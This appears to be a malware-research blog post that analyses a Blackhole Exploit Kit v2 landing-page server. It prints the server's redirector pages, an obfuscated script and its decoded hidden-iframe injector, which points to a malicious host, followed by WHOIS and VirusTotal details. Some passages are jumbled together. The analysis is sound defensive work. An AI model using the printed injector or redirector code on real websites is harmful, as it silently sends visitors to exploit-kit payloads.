Again with pairing with @Hulk_Crusader we detected and deeply accessed the BHEK2 landing page infector server as per reported with following details:
#MalwareMustDie!!
HostName/URL:h00p://qtecmetalworks.co.za/This malware server was "adjusted" by angels:-)) to be accessed from global↓ ↑We call it Blackhole Landing Page (assumed is ver2) Then we downloaded all of the data in the malware server into our local drive: The files we grabbed in total:
IP: 184.22.145.99
ASN |Prefix | ASName| CN |Domain |ISP of an IP Address
---------------------------------------------------------------------------------
21788 | 184.22.128.0/19 | NOC | US | NOCINC.COM | NETWORK OPERATIONS CENTER INCFINISHED --00:59:09--And here we are ready to analyze one by one :-)
Downloaded: 317,468 bytes in 51 filesBHEK2 Landing Page of js.js Infectors...
This server is meant to infect malware served by Blackhole EK v2, functioned as a landing page with some infectors lead to js.js, the name of directories are randomized for the usage of "one-click" infection method. Link to the js.js can be found in the "random-named" sub directories, with below PoC:$ cat 3BkNLfK8/index.html
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="h00p://bigdeal.my/gH9BUAPd/js.js"></script>
<script type="text/javascript" src="h00p://homesinthe.us/e9TmYhbq/js.js"></script>
<script type="text/javascript" src="h00p://pharmacieherbale.com/3oBLjMv7/js.js"></script>
<script type="text/javascript" src="h00p://tadahsweets.com/4gU6HwJg/js.js"></script>
<script type="text/javascript" src="h00p://www.butvietnewsonline.com/3SoPsS1j/js.js"></script>
<script type="text/javascript" src="h00p://www.zumbrazilforuns.com.br/utAfPYW3/js.js"></script>
</html>
$ cat 3m25hamZ/index.html
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="h00p://bigdeal.my/gH9BUAPd/js.js"></script>
<script type="text/javascript" src="h00p://homesinthe.us/e9TmYhbq/js.js"></script>
<script type="text/javascript" src="h00p://pharmacieherbale.com/3oBLjMv7/js.js"></script>
<script type="text/javascript" src="h00p://tadahsweets.com/4gU6HwJg/js.js"></script>
<script type="text/javascript" src="h00p://www.butvietnewsonline.com/3SoPsS1j/js.js"></script>
<script type="text/javascript" src="h00p://www.zumbrazilforuns.com.br/utAfPYW3/js.js"></script>
</html>
$ cat 4rXBB637/index.html
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="h00p://bigdeal.my/gH9BUAPd/js.js"></script>
<script type="text/javascript" src="h00p://homesinthe.us/e9TmYhbq/js.js"></script>
<script type="text/javascript" src="h00p://pharmacieherbale.com/3oBLjMv7/js.js"></script>
<script type="text/javascript" src="h00p://tadahsweets.com/4gU6HwJg/js.js"></script>
<script type="text/javascript" src="h00p://www.butvietnewsonline.com/3SoPsS1j/js.js"></script>
<script type="text/javascript" src="h00p://www.zumbrazilforuns.com.br/utAfPYW3/js.js"></script>
</html>
$ cat 6QeGacX2/index.html
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="h00p://bigdeal.my/gH9BUAPd/js.js"></script>
<script type="text/javascript" src="h00p://homesinthe.us/e9TmYhbq/js.js"></script>
<script type="text/javascript" src="h00p://pharmacieherbale.com/3oBLjMv7/js.js"></script>
<script type="text/javascript" src="h00p://tadahsweets.com/4gU6HwJg/js.js"></script>
<script type="text/javascript" src="h00p://www.butvietnewsonline.com/3SoPsS1j/js.js"></script>
<script type="text/javascript" src="h00p://www.zumbrazilforuns.com.br/utAfPYW3/js.js"></script>
</html>
$ cat 6zyrYCSy/index.html
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="h00p://bigdeal.my/gH9BUAPd/js.js"></script>
<script type="text/javascript" src="h00p://homesinthe.us/e9TmYhbq/js.js"></script>
<script type="text/javascript" src="h00p://pharmacieherbale.com/3oBLjMv7/js.js"></script>
<script type="text/javascript" src="h00p://tadahsweets.com/4gU6HwJg/js.js"></script>
<script type="text/javascript" src="h00p://www.butvietnewsonline.com/3SoPsS1j/js.js"></script>
<script type="text/javascript" src="h00p://www.zumbrazilforuns.com.br/utAfPYW3/js.js"></script>
</html>
$ cat 89ac0r17/index.html
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="h00p://bigdeal.my/gH9BUAPd/js.js"></script>
<script type="text/javascript" src="h00p://homesinthe.us/e9TmYhbq/js.js"></script>
<script type="text/javascript" src="h00p://pharmacieherbale.com/3oBLjMv7/js.js"></script>
<script type="text/javascript" src="h00p://tadahsweets.com/4gU6HwJg/js.js"></script>
<script type="text/javascript" src="h00p://www.butvietnewsonline.com/3SoPsS1j/js.js"></script>
<script type="text/javascript" src="h00p://www.zumbrazilforuns.com.br/utAfPYW3/js.js"></script>Plugin Detect access infector...
There is one html file called postinfo.html which is having links that goes to the BHEK PluginDetect, (which the PluginDetect) server looks already taken down.. Well, the postinfo.html has the evil code like this↓<body><!--de1b9a--><script>String.prototype.test="harC";for(i in $='')if(i=='test')Which we decoded these in to below code:
-n,97-n,115-n,107-n,99-n,108-n,114-n,44-n,101-n,99-n,114-n,67-n,106-n,99-n,107-n,99
,117-n,112-n,103-n,114-n,99-n,38-n,32-n,58-n,103-n,100-n,112-n,95-n,107-n,99-n,30-n
7-n,30-n,117-n,103-n,98-n,114-n,102-n,59-n,37-n,47-n,46-n,37-n,30-n,102-n,99-n,103-
56-n,46-n,57-n,114-n,109-n,110-n,56-n,46-n,57-n,37-n,60-n,58-n,45-n,103-n,100-n,112
99-n,107-n,99-n,108-n,114-n,38-n,37-n,103-n,100-n,112-n,95-n,107-n,99-n,37-n,39-n,5
01-n,99-n,59-n,52-n,53-n,98-n,46-n,53-n,55-n,54-n,49-n,97-n,54-n,97-n,52-n,99-n,95-
15-n,114-n,99-n,37-n,57-n,100-n,44-n,113-n,114-n,119-n,106-n,99-n,44-n,106-n,99-n,1
4-n,114-n,112-n,103-n,96-n,115-n,114-n,99-n,38-n,37-n,102-n,99-n,103-n,101-n,102-n,
,102-n,103-n,106-n,98-n,38-n,100-n,39-n,57-n,7-n,7-n,123-n];for(i=0;i<n.length;i++)
:if (document.getElementsByTagName('body')「0」){↑As per code mentioned is an iframer script of below:
iframer();}
else {
document.write("
<iframe src='h00p://mittemidagi.com/main.php?page=67d07983c8c6ea7f' width='10' height='10'
style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src', 'h00p://mittemidagi.com/main.php?page=67d07983c8c6ea7f');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);}<iframe src='h00p://mittemidagi.com/main.php?page=67d07983c8c6ea7f'↑just checking the domain and found interesting owner name:-))
width='10' height='10' style=
'visibility:hidden;position:absolute;left:0;top:0;'></iframe>Registrant:All of the payloads and CnC of this server is already taking cared of, so we don't go to the deatils of those, let's get the next infectors! :-)
Bob Dylan +1.38489858898 +1.38489858898
MitteMidagi
85 Avenu
New York,NY,US 32134
Domain Name:mittemidagi.com
Record last updated at 2011-09-07 15:29:41
Record created on 9/7/2011
Record expired on 09/07/2012Virus Total checks...
index.html (20/44) [LINK]postinfo.html (26/43) [LINK]The sample is shared...
For fellow researchers, here's the sample:--->>[LINK]
0 nhận xét:
Đăng nhận xét